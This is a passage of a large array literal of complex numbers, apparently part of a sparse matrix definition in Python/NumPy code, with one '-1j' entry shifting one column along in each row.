0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. - 1.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. - 1.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j],
[0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j, 0. + 0.j,
